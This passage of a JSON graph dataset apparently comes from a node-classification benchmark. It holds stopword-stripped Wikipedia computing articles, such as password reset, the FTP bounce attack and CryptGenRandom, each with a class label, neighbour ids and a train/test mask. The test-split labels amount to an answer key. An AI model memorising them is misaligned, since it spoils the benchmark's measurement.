round fixed set lengths randomize external length thereby decreasing likelihood detecting small changes compression ratio basis breach attack however draft since expired without action",
    "neighbors": [
      513,
      517,
      1157,
      1288,
      9744,
      3473,
      1683,
      1688,
      3742,
      2083,
      2470,
      8358,
      3629,
      11693,
      11569,
      9394,
      7736,
      9281,
      9412,
      3657,
      5834,
      10831,
      4561,
      11345,
      5590,
      474,
      3805,
      7264,
      8674,
      2275,
      7139,
      10341,
      11119,
      501,
      1526,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5108,
    "label": 4,
    "text": "Self-service_password_reset:self-service password reset self-service password reset sspr defined process technology allows users either forgotten password triggered intruder lockout authenticate alternate factor repair problem without calling help desk common feature identity management software often bundled software package password synchronization capability typically users forgotten password launch self-service application extension workstation login prompt using another user web browser telephone call users establish identity without using forgotten disabled password answering series personal questions using hardware authentication token responding notification e-mail less often providing biometric sample voice recognition users either specify new unlocked password ask randomly generated one provided self-service password reset expedites problem resolution users fact thus reduces help desk call volume also used ensure password problems resolved adequate user authentication eliminating important weakness many help desks social engineering attacks intruder calls help desk pretends intended victim user claims forgotten account password asks new password rather merely asking users answer security questions modern password reset systems may also leverage sequence authentication steps despite benefits self-service password reset relies solely answers personal questions introduce new vulnerabilities since answers questions often obtained social engineering phishing techniques simple research users frequently reminded never reveal password less likely treat sensitive answers many commonly used security questions pet names place birth favorite movie much information may publicly available users personal home pages answers elicited someone pretending conduct opinion survey offering free dating service since many organizations standard ways determining login names real names attacker knows names several employees organization choose one whose security answers readily obtained vulnerability strictly due self-service password reset—it often exists help desk prior deployment automation self-service password reset technology often used reduce type vulnerability introducing stronger caller authentication factors human-operated help desk using prior deployment automation september 2008 yahoo e-mail account governor alaska vice president united states nominee sarah palin accessed without authorization someone able research answers two security questions zip code date birth able guess third met husband incident clearly highlighted choice security questions important prevent social engineering attacks password systems jakobsson stolterman wetzel yang proposed use preferences authenticate users password reset underlying insights preferences stable long period time publicly recorded approach includes two phases -- setup authentication setup user asked select items either like dislike several categories items dynamically selected big candidate set presented user random order authentication phase users asked classify preferences like dislike selected items displayed random order jakobsson stolterman wetzel yang evaluated security approach user experiments user emulations attacker simulations two-factor authentication 'strong authentication method adds another layer security password reset process cases consists preference based authentication plus second form physical authentication using something user possesses i.e smartcards usb tokens etc. one popular method sms email advanced sspr software requires user provide mobile phone number personal e-mail address setup event password reset pin code sent user phone email need enter code password reset process modern technology also allows authentication via voice biometrics using voice recognition technology major problem self-service password reset inside corporations similar organizations enabling users access system forgot primary password since sspr systems typically web-based users need launch web browser fix problem yet log workstation problem solved various approaches addressing catch-22 compromises e.g. desktop software deployment domain-wide password reset account telephone access visiting neighbour continuing call help desk etc. companies created software presents restricted web browser login screen sole ability access password reset page without logging system example novell client login extension technology technologies effectively give user access computer resources specifically web browser reset passwords without authenticating computer security high priority capabilities limited user expected mode two additional problems related one locked users conjunction preference-based authentication self-service password reset procedures could also rely network existing human relations among users scenario user forgot password asks colleague assistance helper colleague authenticates password reset application vouches user identity scenario problem changes one authenticating user forgot password one understanding users ability vouch users",
    "neighbors": [
      3521,
      10801,
      1557,
      5433,
      7994,
      5435
    ],
    "mask": "Test"
  },
  {
    "node_id": 5109,
    "label": 2,
    "text": "Absolute_Linux:absolute linux absolute linux lightweight linux distribution works older hardware based slackware linux client designed everyday use internet multimedia documents absolute linux default file window managers icewm rox programs offered default include gimp libreoffice firefox xfburn p7zip qbittorrent many script utilities included absolute linux aid configuration maintenance system",
    "neighbors": [
      5356,
      499,
      5363,
      5397,
      5078,
      3097,
      7483
    ],
    "mask": "Test"
  },
  {
    "node_id": 5110,
    "label": 2,
    "text": "Tinfoil_Hat_Linux:tinfoil hat linux tinfoil hat linux thl compact security-focused linux distribution designed high security developed shmoo group first version 1.000 released february 2002 appears low priority project image files source available gzip format thl used almost modern pc requires intel 80386 better computer least 8 mb ram distribution fits single hd floppy small footprint provides additional benefits beyond making system easy understand verify- computer need even hard drive making easier sanitize computer use logo tinfoil hat tux linux mascot wearing tinfoil hat tinfoil hat uses number measures defeat hardware software surveillance methods like keystroke logging video camera tempest advantage thl used virtually modern pc using x86 processor architecture example one might install computer kept locked room connected network used cryptographically signing keys fairly easy create tinfoil hat booting floppy microsoft windows verifying checksum tricky text documentation salted jokes reinforces humor stark contrast serious paranoiac tone surrounding text- name pokes fun tinfoil hats commonly ascribed paranoiacs method protecting oneself mind-control waves tinfoil hat linux requires one work text-only environment linux i.e starting straight bourne shell editor vi graphical user interface uses busybox instead normal util-linux gnu coreutils formerly known fileutils shellutils textutils common unix tools tinfoil hat also offers gnu nano text editor",
    "neighbors": [
      2050,
      516,
      8837,
      7435,
      6797,
      10127,
      2321,
      8978,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      6436,
      4389,
      9253,
      10149,
      11305,
      7854,
      9646,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      4561,
      1110,
      10967,
      9693,
      2914,
      485,
      3685,
      7527,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      499,
      5363,
      5492,
      9461,
      6393,
      2811,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 5111,
    "label": 4,
    "text": "Christien_Rioux:christien rioux christien rioux also known handle dildog co-founder chief scientist burlington massachusetts based company veracode main patent holder educated mit rioux computer security researcher l0pht heavy industries company stake later bought symantec stake looked security weaknesses software led development smart risk analyzer sra co-authored best-selling windows password auditing tool stake lc l0phtcrack antisniff network intrusion detection system also member cult dead cow ninja strike force formerly member l0pht dildog best known author original code back orifice 2000 open source remote administration tool also well known author tao windows buffer overflow",
    "neighbors": [
      9217,
      9569,
      1187,
      10914,
      1861,
      8135,
      5512,
      6665,
      10279,
      2007,
      8827,
      9214
    ],
    "mask": "Test"
  },
  {
    "node_id": 5112,
    "label": 2,
    "text": "After_School_(app):school app school ios android social network mobile application allows users defined network currently high schools share anonymous text-based posts images others july 2016 school users 20,000 american high schools according ceo michael callahan app created network “ teens could use express reach others ask offer help fellow teens distress. ” app created michael callahan cory levy one inc. debuted mid-november 2014 re-release app april 2015 school implemented “ mature content ” filters age verification 24/7 live anonymous support first fastest internet response system threats february 2016 school announced raising 16.4 million series round app also detects threatening harmful messages using language algorithms enforces single-report immediate user removal violations",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5113,
    "label": 4,
    "text": "FTP_bounce_attack:ftp bounce attack ftp bounce attack exploit ftp protocol whereby attacker able use port command request access ports indirectly use victim machine middle man request technique used port scan hosts discreetly access specific ports attacker access direct connection example nmap port scanner nearly modern ftp server programs configured default refuse port commands would connect host originating host thwarting ftp bounce attacks",
    "neighbors": [
      5636,
      7364,
      10924,
      2797,
      2739,
      3700,
      7031
    ],
    "mask": "Test"
  },
  {
    "node_id": 5114,
    "label": 5,
    "text": "Flock_(web_browser):flock web browser flock discontinued web browser specialized providing social networking web 2.0 facilities built user interface earlier versions flock used gecko html rendering engine mozilla version 2.6.2 released january 27 2011 last version based mozilla firefox starting version 3 flock based chromium used webkit rendering engine flock available free download supported microsoft windows mac os x one time linux well support flock discontinued april 2011 flock successor round two raised money bessemer venture partners catamount ventures shasta ventures angel investors bart decrem geoffrey arone co-founded company flock raised 15 million fourth round funding led fidelity ventures may 22 2008 estimated total 30 million according cnet company previous investors bessemer venture partners catamount ventures shasta ventures also participated round january 2011 flock inc. acquired zynga browser discontinued support ending april 26 2011 flock 2.5 integrated social networking media services including myspace facebook youtube twitter flickr blogger gmail yahoo mail etc logging supported social services flock could track updates friends profiles uploaded photos flock latest 2.5 version added twitter search functionality multi-casting status updates multiple services introduction instant messaging via facebook chat browser features include december 2007 flock mashable open web awards applications widgets march 2008 flock south southwest web award community cnet gave mac os x version flock 1.0 title best mac software 2007 pc world harry mccracken reviewed flock new favorite web browser february 2008 aol announced would discontinue support netscape browser recommended flock firefox alternative browsers userbase netscape 9 users netscape 8 userbase aol recommended flock browser users march 2008 flock announced seen nearly 3 million downloads 135 increase active users first two months 2008 also announced 70 percent flock users making default browser choice may 2008 flock social networking category webby awards flock nominated award along facebook bebo ning flock discontinuation announced april 2011 reviewer joey sneddon omg ubuntu offered analysis whether poor implementation design wise one needs glance 'rockmelt example social browser done right general apathy towards alerts twitter flickr facebook digg et al face time moot flock flocked innovation never quite lived hype upon exiting beta flock number awards",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      9241,
      6171,
      2076,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      9281,
      5707,
      10834,
      5205,
      6231,
      8281,
      2139,
      6747,
      6237,
      106,
      1642,
      9834,
      9841,
      115,
      9843,
      3191,
      4728,
      637,
      1664,
      2182,
      6791,
      6797,
      11418,
      10910,
      8351,
      7340,
      1713,
      9394,
      9908,
      7861,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      9451,
      11000,
      8443,
      9987,
      7943,
      1295,
      7951,
      2836,
      278,
      10006,
      7965,
      1834,
      7983,
      823,
      5435,
      7488,
      10057,
      11082,
      10060,
      2893,
      10078,
      8557,
      7543,
      3961,
      6528,
      3971,
      3462,
      8584,
      4490,
      10126,
      7572,
      5026,
      4013,
      944,
      5054,
      10174,
      9152,
      6086,
      4048,
      5078,
      479,
      482,
      10722,
      5605,
      487,
      488,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 5115,
    "label": 2,
    "text": "WAITS:waits waits heavily modified variant digital equipment corporation monitor operating system later renamed better known tops-10 pdp-6 pdp-10 mainframe computers used stanford artificial intelligence laboratory sail mid-1960s 1991 mainframe computer ran also went name sail never official expansion waits common variant west-coast alternative another variant worst acronym invented timesharing system name endorsed sail community public vote choosing among alternatives two contenders saints stanford ai new timesharing system sinners stanford incompatible non-new extensively rewritten system proposed systems programmers though waits less visible frequent exchange people ideas two communities innovations pioneered waits exerted enormous indirect influence waits alumni xerox parc elsewhere also played major roles developments led xerox star apple macintosh sun workstation later sold sun microsystems early screen modes emacs example directly inspired waits e editor -- one family editors first real-time editing editing commands invisible one typed text point insertion/overwriting modern style multi-region windowing said originated system also featured unusual level support called multimedia computing allowing analog audio video signals including tv radio switched programming terminals switching capability terminal video even allowed users separate offices view type virtual terminal single user instantly switch among multiple full virtual terminals also invented bucky bits thus alt key every ibm pc waits legacy one waits feature notable pre-web days news-wire search engine called ns news service allowed waits hackers instantly find store notified selected ap new york times news-wire stories searches using arbitrary combinations words news story retrieval search instantaneous story automatically indexed words came wire",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      5141,
      9366,
      11539,
      6296,
      25,
      8474,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      11255,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      9665,
      11075,
      8388,
      4423,
      8136,
      9932,
      1613,
      11667,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Train"
  },
  {
    "node_id": 5116,
    "label": 3,
    "text": "Universal_Data_Element_Framework:universal data element framework universal data element framework udef controlled vocabulary developed open group provided framework categorizing naming indexing data assigned every item data structured alphanumeric tag plus controlled vocabulary name describes meaning data allowed relating data elements similar elements defined organizations udef defined dewey-decimal like code concept example employee number often used human resource management udef tag a.5_12.35.8 controlled vocabulary description employee.person_employer.assigned.identifier udef superseded open data element framework o-def application used hospital last name first name several people could include following example concepts examples following udef ids available",
    "neighbors": [
      8975
    ],
    "mask": "Test"
  },
  {
    "node_id": 5117,
    "label": 2,
    "text": "CryptGenRandom:cryptgenrandom cryptgenrandom deprecated cryptographically secure pseudorandom number generator function included microsoft cryptoapi win32 programs microsoft recommends use anywhere random number generation needed 2007 paper hebrew university suggested security problems windows 2000 implementation cryptgenrandom assuming attacker control machine microsoft later acknowledged problems exist windows xp vista microsoft released fix bug windows xp service pack 3 mid-2008 win32 api includes comprehensive support cryptographic security including native tls support via schannel api code signing capabilities built native windows libraries cryptographic operations rsa aes key generation libraries turn rely cryptographically secure pseudorandom number generator csprng cryptgenrandom standard csprng win32 programming environment microsoft-provided cryptography providers share implementation cryptgenrandom currently based internal function called rtlgenrandom general outline algorithm published rtlgenrandom generates specified fips 186-2 appendix 3.1 sha-1 g function entropy nowiki /nowiki omitted long lists low-level system information fields performance counters nowiki /nowiki security cryptosystem csprng significant origin dynamic key material keys needed fly aes tls session keys protect https sessions bank websites originate csprngs pseudorandom numbers predictable session keys predictable well cryptgenrandom de facto standard csprng win32 environments security critical windows users specifics cryptgenrandom algorithm officially published unpublished random number generation algorithm may susceptible theoretical weaknesses including use outdated algorithms reliance entropy gathering several monotonically-increasing counters might estimated controlled extent attacker local access system cryptanalysis cryptgenrandom published november 2007 leo dorrendorf others hebrew university jerusalem university haifa found significant weaknesses windows 2000 implementation algorithm take advantage vulnerability attacker would first need compromise program running random number generator weaknesses paper depend attacker siphoning state bits generator attacker position carry attack would typically already position defeat random number generator instance simply sniff outputs generator fix memory known values however hebrew university team notes attacker need steal state bits order persistently violate security cryptgenrandom instance also use information glean determine past random numbers generated potentially compromising information credit card numbers already sent paper attacks based fact cryptgenrandom uses stream cipher rc4 run backwards state known also take advantage fact cryptgenrandom runs user mode allowing anyone gains access operating system user level example exploiting buffer overflow get cryptgenrandom state information process finally cryptgenrandom refreshes seed entropy infrequently problem aggravated fact win32 process instance cryptgenrandom state means compromise one process transitively compromise every process may also increase longevity successful break details cryptgenrandom algorithm public dorrendorf team used reverse engineering tools discern algorithm works paper first published record windows cryptographic random number generator operates windows 2000 xp 2003 successfully undergone eal4+ evaluations including cryptgenrandom fipsgenrandom implementations security target documentation available common criteria portal indicates compliance eal4 requirements conclusions drawn security algorithm result eal4 measures products best practices stated security objectives rarely involves in-depth cryptanalysis microsoft obtained validation rng implementations following environments tests designed test conformance various approved rng specifications rather provide measure product ’ security ... thus validation interpreted evaluation endorsement overall product security conclusions drawn security algorithm result fips evaluations necessarily inspect source code evaluate way rng seeds generated windows developers several alternative means accessing cryptgenrandom functionality alternatives invoke algorithm share security characteristics may advantages historically always told developers use functions rand generate keys nonces passwords rather use functions like cryptgenrandom creates cryptographically secure random numbers problem cryptgenrandom need pull cryptoapi cryptacquirecontext fine 're using crypto functions default windows xp later install cryptgenrandom calls function named advapi32 rtlgenrandom require load cryptapi stuff fact new whidbey crt function rand_s calls rtlgenrandom programmers using .net use rngcryptoserviceprovider class cng long term replacement deprecated crypto api provides equivalent function bcryptgenrandom well dedicated functions key generation",
    "neighbors": [
      11584,
      8065,
      1474,
      8679,
      8554,
      9196,
      5677,
      1683,
      5397,
      3573,
      1941,
      10173
    ],
    "mask": "None"
  },
  {
    "node_id": 5118,
    "label": 5,
    "text": "Logical_link_control:logical link control ieee 802 reference model computer networking logical link control llc data communication protocol layer upper sublayer data link layer layer 2 seven-layer osi model llc sublayer provides multiplexing mechanisms make possible several network protocols e.g ip ipx decnet appletalk coexist within multipoint network transported network medium also provide flow control automatic repeat request arq error management mechanisms llc sublayer acts interface media access control mac sublayer network layer llc sublayer primarily concerned multiplexing protocols transmitted mac layer transmitting demultiplexing receiving also provide node-to-node flow control error management flow control error management capabilities llc sublayer used protocols netbios frames protocol however protocol stacks running atop 802.2 use llc sublayer flow control error management cases flow control error management taken care transport layer protocol tcp application layer protocol higher layer protocols work end-to-end fashion i.e re-transmission done original source final destination rather individual physical segments protocol stacks multiplexing capabilities llc sublayer used llc sublayer key component early packet switching networks x.25 networks lapb data link layer protocol flow control error management carried node-to-node fashion meaning error detected frame frame retransmitted one switch next instead extensive handshaking nodes made networks slow ieee 802.2 standard specifies llc sublayer ieee 802 local area networks ieee 802.3/ethernet ethertype field used ieee 802.5 ieee 802.11 ieee 802.2 also used non-ieee 802 networks fddi since bit errors rare wired networks ethernet provide flow control automatic repeat request arq meaning incorrect packets detected cancelled retransmitted except case collisions detected csma/cd mac layer protocol instead retransmissions rely higher layer protocols ethertype ethernet frame using ethernet ii framing used multiplex different protocols top ethernet mac header seen llc identifier however ethernet frames lacking ethertype llc identifier ethernet header instead use ieee 802.2 llc header ethernet header provide protocol multiplexing function wireless communications bit errors common wireless networks ieee 802.11 flow control error management part csma/ca mac protocol part llc layer llc sublayer follows ieee 802.2 standard non-ieee 802 protocols thought split mac llc layers example hdlc specifies mac functions framing packets llc functions protocol multiplexing flow control detection error control retransmission dropped packets indicated protocols cisco hdlc use hdlc-like packet framing llc protocol telephone network modems ppp link layer protocols considered llc protocol providing multiplexing provide flow control error management telephone network bit errors might common meaning error management crucial today provided modern protocols today modem protocols inherited llc features older lapm link layer protocol made modem communication old x.25 networks gprs llc layer also ciphering deciphering sn-pdu sndcp packets another example data link layer split llc flow error control mac multiple access itu-t g.hn standard provides high-speed local area networking existing home wiring power lines phone lines coaxial cables",
    "neighbors": [
      6403,
      9860,
      9987,
      1030,
      3847,
      9992,
      6544,
      1297,
      3218,
      7698,
      8211,
      11413,
      5270,
      6681,
      5402,
      5021,
      2206,
      3742,
      5405,
      10271,
      10274,
      1955,
      9381,
      4650,
      10924,
      562,
      2994,
      2996,
      9909,
      4918,
      3383,
      7478,
      7865,
      3133,
      3006,
      4543,
      2752,
      4797,
      5437,
      5439,
      7360,
      7364,
      11332,
      2887,
      8265,
      2509,
      4691,
      2904,
      5469,
      1246,
      5470,
      5472,
      1121,
      10079,
      1893,
      10344,
      11112,
      8432,
      5875,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 5119,
    "label": 2,
    "text": "Image_Mastering_API:image mastering api image mastering application programming interface imapi component microsoft windows operating system used cd dvd authoring recording windows applications windows media player windows media center windows movie maker windows dvd maker windows explorer use imapi create iso images burn discs windows refers discs created using imapi mastered burns contrast term live file system implies packet writing use imapi imapi originally introduced windows xp imapi version 2.0 released windows vista windows server 2008 26 june 2007 version released update windows xp windows server 2003 microsoft received requests hardware software vendors 19 january 2009 microsoft released windows feature pack storage 1.0 update allows imapi 2.0 support recordable blu-ray disc bd-r rewritable blu-ray disc bd-re media also adds support universal disk format udf 2.5 file system windows feature pack storage available windows xp later integrated windows 7 imapi provides ability create burn single-session multi-session discs including bootable discs also provides low-level access burn engine developing support new devices well access extended recorder properties imapi supports every major writable cd dvd format including imapi supports writing disks iso 9660 including cdda audio joliet imapi v2.0 also supports writing discs universal disk format file system imapi version 2.0 supports following additional features unlike imapi version 1.0 imapi version 2.0 implemented dll rather windows service imapi 2.0 suffers limitations notably allow filesystem imported raw image .iso file optical drive effect means generate disk images used modify",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      5231,
      1656,
      7290,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      9869,
      3224,
      4771,
      7846,
      2221,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      5413,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      8080,
      9114,
      10654,
      8607,
      11683,
      6062,
      6584,
      2493,
      7629,
      8161,
      6114,
      4074,
      9196,
      4590,
      11247,
      3573,
      10229
    ],
    "mask": "Test"
  },
  {
    "node_id": 5120,
    "label": 2,
    "text": "Copy-on-write:copy-on-write copy-on-write cow cow sometimes referred implicit sharing shadowing resource-management technique used computer programming efficiently implement duplicate copy operation modifiable resources resource duplicated modified necessary create new resource resource shared copy original modifications must still create copy hence technique copy operation deferred first write sharing resources way possible significantly reduce resource consumption unmodified copies adding small overhead resource-modifying operations copy-on-write finds main use sharing virtual memory operating system processes implementation fork system call typically process modify memory immediately executes new process replacing address space entirely thus would wasteful copy process memory fork instead copy-on-write technique used copy-on-write implemented efficiently using page table marking certain pages memory read-only keeping count number references page data written pages kernel intercepts write attempt allocates new physical page initialized copy-on-write data although allocation skipped one reference kernel updates page table new writable page decrements number references performs write new allocation ensures change memory one process visible another copy-on-write technique extended support efficient memory allocation page physical memory filled zeros memory allocated pages returned refer page zeros marked copy-on-write way physical memory allocated process data written allowing processes reserve virtual memory physical memory use memory sparsely risk running virtual address space combined algorithm similar demand paging copy-on-write pages also used linux kernel kernel same-page merging feature loading libraries application also use copy-on-write technique dynamic linker maps libraries private like follows writing action libraries trigger cow virtual memory management codice_1 cow also used library application system code multithreaded systems cow implemented without use traditional locking instead use compare-and-swap increment decrement internal reference counter since original resource never altered safely copied multiple threads reference count increased without need performance-expensive locking mutexes reference counter turns 0 definition 1 thread holding reference resource safely de-allocated memory without use performance-expensive locking mechanisms benefit copy resource resulting performance gain traditional deep-copying therefore valid single- multithreaded systems string class provided c++ standard library specifically designed allow copy-on-write implementations initial c++98 standard newer c++11 standard php programming language types except references implemented copy-on-write example strings arrays passed reference modified duplicated non-zero reference counts allows act value types without performance problems copying assignment making immutable qt framework many types copy-on-write implicitly shared qt terms qt uses atomic compare-and-swap operations increment decrement internal reference counter since copies cheap qt types often safely used multiple threads without need locking mechanisms mutexes benefits cow thus valid single- multithreaded systems cow may also used underlying mechanism snapshots provided logical volume management file systems btrfs zfs database servers microsoft sql server typically snapshots store modified data stored close main array weak form incremental backup substitute full backup systems also use cow technique avoid fuzzy backups otherwise incurred file set files backed changes backup implementing snapshots two techniques despite names copy-on-write usually refers first technique cow two data writes compared row one difficult implement efficiently thus used infrequently copy-on-write technique used emulate read-write storage media require wear leveling physically write read many qcow2 qemu copy write disk image format uses copy-on-write technique reduce disk image size live cds live usbs use copy-on-write techniques give impression able add delete files directory without actually making changes cd usb flash drive phantom os uses cow levels database file system time computer running system fail starts software operating system resume operation small amounts work lost basic approach program data kept virtual memory schedule summary software data written virtual memory forming log tracks current value location value computer fails recent copy log data remain safe disk operation resumes operating system software reads log restore consistent copies programs data approach uses copy-on-write levels software including application software requires support within application programming language practice phantom os permits languages generate java byte codes",
    "neighbors": [
      2051,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      4637,
      5661,
      9249,
      9762,
      5158,
      10292,
      3640,
      7225,
      11323,
      8772,
      1109,
      86,
      11351,
      3170,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      1150,
      9343,
      10883,
      7818,
      654,
      4238,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      1199,
      7344,
      2230,
      5816,
      8379,
      1212,
      8380,
      3265,
      10951,
      9420,
      2253,
      5840,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      731,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      2804,
      246,
      3834,
      3328,
      11012,
      1801,
      2314,
      8461,
      6416,
      1810,
      11539,
      11030,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3366,
      6438,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      5940,
      6968,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      4438,
      346,
      2395,
      2397,
      6494,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7039,
      7554,
      6536,
      7561,
      8075,
      7565,
      8080,
      6545,
      5013,
      2966,
      11675,
      11676,
      414,
      2974,
      7070,
      4004,
      10151,
      4012,
      1454,
      6062,
      8114,
      2995,
      7603,
      8631,
      1464,
      8633,
      1978,
      8643,
      8644,
      7126,
      2015,
      1509,
      9189,
      7663,
      5106,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 5121,
    "label": 8,
    "text": "Co-ment:co-ment co-ment online word processor allowing collaborative writing commenting inspired software package stet created handle gnu gpl version 3 online revision free software available affero gpl co-ment allows groups users collaboratively elaborate online texts offers wiki-style editing environment supporting many syntaxes allows finely controlled layouts including table images main interest comment feature allowing users attach remarks specific extracts text leading text building procedure based strong equipped debates advanced comment navigation features also provided help discover new annotations go history debate also possible set email alerts text edits new comments co-ment fitted many import/export formats support txt doc odt html co-ment special focus layout respect exported file types available free web service extended pro accounts following wordpress model source code available website also bundled drupal module greatest use cases co-ment education particular first language literature teaching secondary education co-ment inspired stet tool created handle online revision gpl v3 since used licenses mozilla public license creative commons licence family co-ment also used legal works administrative works advocacy works",
    "neighbors": [
      8554
    ],
    "mask": "Test"
  },
  {
    "node_id": 5122,
    "label": 0,
    "text": "Collocation_extraction:collocation extraction collocation extraction task using computer extract collocations automatically corpus traditional method performing collocation extraction find formula based statistical quantities words calculate score associated every word pairs proposed formulas mutual information t-test z test chi-squared test likelihood ratio within area corpus linguistics collocation defined sequence words terms co-occur often would expected chance 'crystal clear 'middle management 'nuclear family 'cosmetic surgery examples collocated pairs words words often found together make compound noun example 'riding boots 'motor cyclist",
    "neighbors": [
      2440,
      2059,
      6798,
      11538,
      1044,
      5399,
      538,
      7599,
      4531,
      4662,
      3127,
      2488,
      10557,
      6208,
      3533,
      5197,
      6223,
      8538,
      5857,
      1890,
      7780,
      7918,
      8046,
      8688,
      9200,
      10231,
      8440,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 5123,
    "label": 2,
    "text": "Etcher_(software):etcher software balenaetcher commonly referred 'etcher free open-source utility used writing image files .iso .img files well zipped folders onto storage media create live sd cards usb flash drives developed balena licensed apache license 2.0 etcher developed using electron framework supports windows macos linux latest stable release balenaetcher version 1.5.51. balenaetcher originally called etcher name changed october 29 2018 resin.io changed name balena balenaetcher uses google analytics mixpanel even 'send anonymous usage data checkbox checked etcher primarily used graphical user interface additionally command line interface available active development future planned features include support persistent storage allowing live sd card usb flash drive used hard drive well support flashing multiple boot partitions single sd card usb flash drive",
    "neighbors": [
      3462,
      5612,
      7983,
      11221,
      6012,
      4637
    ],
    "mask": "Test"
  },
  {
    "node_id": 5124,
    "label": 3,
    "text": "Macadam_Bumper:macadam bumper macadam bumper also known pinball wizard computer pinball construction set developed ere informatique france first released 8-bit computers 1985 atari st 1986 ms-dos 1987 st pc versions released us pinball wizard 1988 accolade game includes full-featured graphics sound lights even tilt capability game features four simulations varying obstacles atari st flipper back-board controls manipulated mouse moving mouse much activate tilt sensors players customize game changing parameters point scores table slope bumper elasticity number game balls parts menu player assemble pinball machine paint decorate game ’ paint menu 1988 dragon gave game 4½ 5 stars",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 5125,
    "label": 4,
    "text": "Kill_Pill:kill pill computing kill pill term given mechanisms technologies designed render systems useless either user command predefined set circumstances kill pill technology commonly used disable lost stolen devices security purposes also used enforcement rules contractual obligations kill pill technology used prominently smartphones especially disablement lost stolen devices notable example find iphone service allows user password protect wipe idevice remotely aiding protection private data similar applications exist smartphone operating systems including android blackberry windows phone kill pill technology notably used anti-piracy measure windows vista released ability severely limit functionality determined copy obtained piracy feature later dropped complaints false positives caused genuine copies vista act though pirated concept kill pill also applied remote removal server malicious files applications client system technology standard component handheld computing devices mainly due generally limited operating systems means obtaining applications functionality also reportedly available applications downloaded windows store windows 8 operating systems kill pill technology used frequently vehicles variety reasons remote vehicle disablement used prevent vehicle starting prevent moving prevent vehicle continued operation non-remotely vehicles require driver recognition starting moving asking password form biometrics driver kill pill technology often used governments prevent drunk driving repeat offenders punishment deterrent installation ignition interlock devices sentencing alternative drunk drivers almost 50 united states device requires driver blow breathalyzer starting vehicle driver found legal blood alcohol content limit vehicle start kill pill technology also implemented contextually disable certain aspects smartphone functionality patent obtained apple claims ability disable antenna screen camera smartphone settings like theaters schools areas high security sensitivity kill pill technology criticized allowing suppression personal liberties kill pill utilized school setting prevent academic dishonesty suggested governments may also use suppress people example disabling phone camera antenna area protest ability remotely remove files applications user device also come fire apple apparent ability blacklist applications rendering unusable idevice raised concerns user rights downloading app store july 2014 applications appear apple blacklist website",
    "neighbors": [
      9063,
      11368,
      4490,
      10900,
      1083,
      10207
    ],
    "mask": "Test"
  },
  {
    "node_id": 5126,
    "label": 1,
    "text": "Navy_Directory:navy directory navy directory formerly navy list naval register official list naval officers ranks seniority ships command appointed etc. published government naval authorities country navy list fulfills important function international law warships required article 29 united nations convention law sea commanded commissioned officer whose name appears appropriate service list past copies navy list also important sources information historians genealogists navy list royal navy longer published hard-copy royal navy united kingdom publishes annual lists active reserve officers biennial lists retired officers equivalent united states navy naval register updated online continuous basis ship removed naval vessel register united states naval list country ship said stricken 2015 navy list renamed 'navy directory good sources historical data royal navy navy lists current editor navy list cliona willis",
    "neighbors": [
      650
    ],
    "mask": "None"
  },
  {
    "node_id": 5127,
    "label": 3,
